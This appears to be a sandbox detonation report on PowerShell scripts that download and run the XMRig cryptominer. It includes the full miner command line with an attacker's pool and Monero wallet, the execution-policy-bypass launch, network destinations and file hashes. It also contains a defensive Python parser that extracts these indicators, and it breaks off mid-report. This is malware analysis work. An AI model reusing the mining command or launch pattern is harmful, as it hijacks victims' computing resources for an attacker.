memory/3568-112-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-113-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-114-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-115-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-116-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-117-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-118-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:20

Platform

win10v2004-20240226-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1328 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1396 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 142.250.200.42:443 tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eudgennn.nme.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:15

Platform

win10v2004-20240226-en

Max time kernel

1797s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4144 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3984 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.179.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klbhpycc.bne.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:20

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wx54ioyj.mzk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:23

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
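The xmrig.exe command line recorded under Processes above carries every IOC a responder needs from this run: the pool (stratum over TLS to rx.unmineable.com:443), the algorithm (-a rx, RandomX, which is also why the Signatures table shows xmrig.exe adjusting SeLockMemoryPrivilege to get large pages), and the unMineable user string COIN:ADDRESS.WORKER whose Monero address is the attacker's payment identity and the best pivot across samples. The following parser is an added example written for this report, not sandbox output or XMRig code; it covers only the XMRig options seen here (-a/--algo, -o/--url, -u/--user, -p/--pass, --tls), and the Monero address check is a format heuristic (95 base58 characters starting with 4 or 8), not a checksum validation.

```python
"""Extract pool and wallet IOCs from an XMRig command line (added example)."""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

# Command line exactly as recorded under Processes in behavioral17/20/21/28.
OBSERVED_CMDLINE = (
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
    "-o stratum+ssl://rx.unmineable.com:443 "
    "-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"
    ".unmineable_worker_vilqtiac -p x"
)

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
_OPTS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
         "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}
# unMineable user strings look like COIN:ADDRESS.WORKER[#REFERRAL]
_UNMINEABLE_USER = re.compile(
    r"^(?P<coin>[A-Z0-9]+):(?P<addr>[^.#\s]+)(?:\.(?P<worker>[^#\s]+))?(?:#\S+)?$")
# Heuristic only: standard ('4') or sub- ('8') Monero mainnet address, 95 base58 chars.
_MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


@dataclass
class MinerIOC:
    binary: str
    algo: Optional[str] = None
    pool_host: Optional[str] = None
    pool_port: Optional[int] = None
    tls: bool = False
    coin: Optional[str] = None
    wallet: Optional[str] = None
    worker: Optional[str] = None
    password: Optional[str] = None


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


def _apply_pool(ioc: MinerIOC, url: str) -> None:
    if "://" not in url:
        url = "stratum+tcp://" + url  # XMRig treats a bare host:port as plain stratum
    parts = urlsplit(url)
    ioc.pool_host = parts.hostname
    ioc.pool_port = parts.port
    if parts.scheme.endswith(("+ssl", "+tls")):
        ioc.tls = True


def _apply_user(ioc: MinerIOC, user: str) -> None:
    m = _UNMINEABLE_USER.match(user)
    if m:
        ioc.coin, ioc.wallet, ioc.worker = m["coin"], m["addr"], m["worker"]
    else:  # ordinary pools: WALLET or WALLET.WORKER
        ioc.wallet, _, worker = user.partition(".")
        ioc.worker = worker or None


def parse_xmrig_cmdline(cmdline: str) -> MinerIOC:
    toks = tokenize(cmdline)
    ioc = MinerIOC(binary=toks[0])
    i = 1
    while i < len(toks):
        name, value = toks[i], None
        if name.startswith("--") and "=" in name:
            name, value = name.split("=", 1)
        if name == "--tls":
            ioc.tls = True
        elif name in _OPTS:
            if value is None and i + 1 < len(toks):
                i += 1
                value = toks[i]
            kind = _OPTS[name]
            if kind == "algo":
                ioc.algo = value
            elif kind == "pass":
                ioc.password = value
            elif kind == "url" and value:
                _apply_pool(ioc, value)
            elif kind == "user" and value:
                _apply_user(ioc, value)
        i += 1
    return ioc


def looks_like_monero_address(addr: Optional[str]) -> bool:
    return bool(addr) and _MONERO_ADDR.match(addr) is not None


if __name__ == "__main__":
    ioc = parse_xmrig_cmdline(OBSERVED_CMDLINE)
    print(ioc)
    print("monero-format wallet:", looks_like_monero_address(ioc.wallet))
```

The wallet and worker name are what to search for in other detonations and in pool-side telemetry; the pool host and port go into network blocking, and the stratum+ssl scheme tells you the mining traffic will look like ordinary TLS on 443, so the destination, not the protocol, is the detection handle.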

Files

memory/1640-3-0x00007FFDDF723000-0x00007FFDDF724000-memory.dmp

memory/1640-5-0x0000026AC1EE0000-0x0000026AC1F02000-memory.dmp

memory/1640-6-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/1640-9-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/1640-10-0x0000026ADA5D0000-0x0000026ADA646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45skuy1a.drk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1640-25-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/1640-48-0x0000026ADA3F0000-0x0000026ADA402000-memory.dmp

memory/1640-61-0x0000026ADA3E0000-0x0000026ADA3EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/912-90-0x00000273B98D0000-0x00000273B98F0000-memory.dmp

memory/912-91-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/1640-92-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/1640-94-0x00007FFDDF723000-0x00007FFDDF724000-memory.dmp

memory/912-93-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/1640-95-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/912-96-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-97-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-98-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-99-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-100-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-101-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-102-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-103-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-104-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-105-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-106-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-107-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-108-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-109-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-110-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-111-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-112-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-113-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-114-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-115-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-116-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-117-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-118-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-119-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-120-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-121-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-122-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-123-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-124-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-125-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-126-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-127-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-128-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-129-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-130-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-131-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-132-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-133-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-134-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-135-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-136-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-137-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-138-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-139-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-140-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-141-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-142-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-143-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-144-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-145-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-146-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-147-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-148-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-149-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-150-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-151-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-152-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-153-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-154-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-155-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-156-0x00007FF603520000-0x00007FF604153000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:32

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, all fields N/A (the sandbox recorded no per-hit description, indicator, process or target for this signature)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
